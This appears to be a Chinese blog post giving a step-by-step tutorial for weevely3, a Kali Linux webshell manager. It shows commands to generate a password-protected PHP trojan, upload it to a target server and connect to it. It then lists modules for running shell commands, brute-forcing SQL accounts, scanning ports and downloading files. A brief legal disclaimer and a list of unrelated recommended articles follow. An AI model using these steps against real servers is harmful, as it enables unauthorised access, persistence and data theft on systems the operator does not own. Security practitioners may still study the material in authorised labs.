
2021Kali系列 -- linux菜刀(weevely3)
发布日期:2021-05-06 08:55:07
浏览次数:68
分类:精选文章
本文共 818 字,大约阅读时间需要 2 分钟。
运行在Linux系统上的WebShell管理工具,功能包括Shell访问目标、SQL控制台、HTTP/HTTPS代理浏览、文件上传下载、反向和直接TCP Shell生成、远程目标安全审核、端口扫描以及Bruteforce SQL账户攻击。
安装与使用指南
1. 下载
通过GitHub克隆项目仓库:
git clone https://github.com/epinna/weevely3.git
2. 安装依赖
进入项目目录并安装所需Python模块:
cd weebely3 pip3 install -r requirements.txt
3. 启动工具
运行主脚本启动WebShell管理界面:
./weevely.py
4. 生成木马文件
在指定目录生成连接木马文件:
./weevely.py generate 123 shell.php
5. 上传木马文件
将生成的shell.php
文件上传至目标服务器。
6. 连接木马
通过命令连接木马:
./weevely.py http://目标IP:目标端口/shell.php 123
7. 操作木马
- 获取文件目录:
dir
- 利用模块收集信息:
system_info -info uname
- 查看可用模块:
help
8. 使用模块
支持多种操作模块,如:
- 执行Shell命令:
:shell_sh
- PHP命令:
:shell_php
- Brute force SQL:
:bruteforce_sql
- 端口扫描:
:net_scan
- 文件操作:
:file_find, :file_download, :file_cd
- 远程文件挂载:
:file_mount
- SQL控制台:
:sql_console
9. 注意事项
- 非法使用将导致法律后果,使用时请遵守相关法律法规。
- 建议在测试环境中练习,确保操作安全。
10. 关注
- 订阅公众号“Web安全工具库”: 欢迎关注视频号“之乎者也吧”。
发表评论
最新留言
留言是一种美德,欢迎回访!
[***.207.175.100]2025年03月26日 22时13分07秒
关于作者

喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
MVC学习系列5--Layout布局页和RenderSection的使用
2019-03-06
多线程之volatile关键字
2019-03-06
2.1.4奇偶校验码
2019-03-06
2.2.2原码补码移码的作用
2019-03-06
ForkJoinPool线程池
2019-03-06
【Struts】配置Struts所需类库详细解析
2019-03-06
Java面试题:Servlet是线程安全的吗?
2019-03-06
Java集合总结系列2:Collection接口
2019-03-06
Linux学习总结(九)—— CentOS常用软件安装:中文输入法、Chrome
2019-03-06
大白话说Java反射:入门、使用、原理
2019-03-06
集合系列 Set(八):TreeSet
2019-03-06
MySQL用户管理:添加用户、授权、删除用户
2019-03-06
比技术还重要的事
2019-03-06
linux线程调度策略
2019-03-06
软中断和实时性
2019-03-06
Linux探测工具BCC(可观测性)
2019-03-06
流量控制--2.传统的流量控制元素
2019-03-06
SNMP介绍及使用,超有用,建议收藏!
2019-03-06
51nod 1596 搬货物(二进制处理)
2019-03-06
来自星星的祝福(容斥+排列组合)
2019-03-06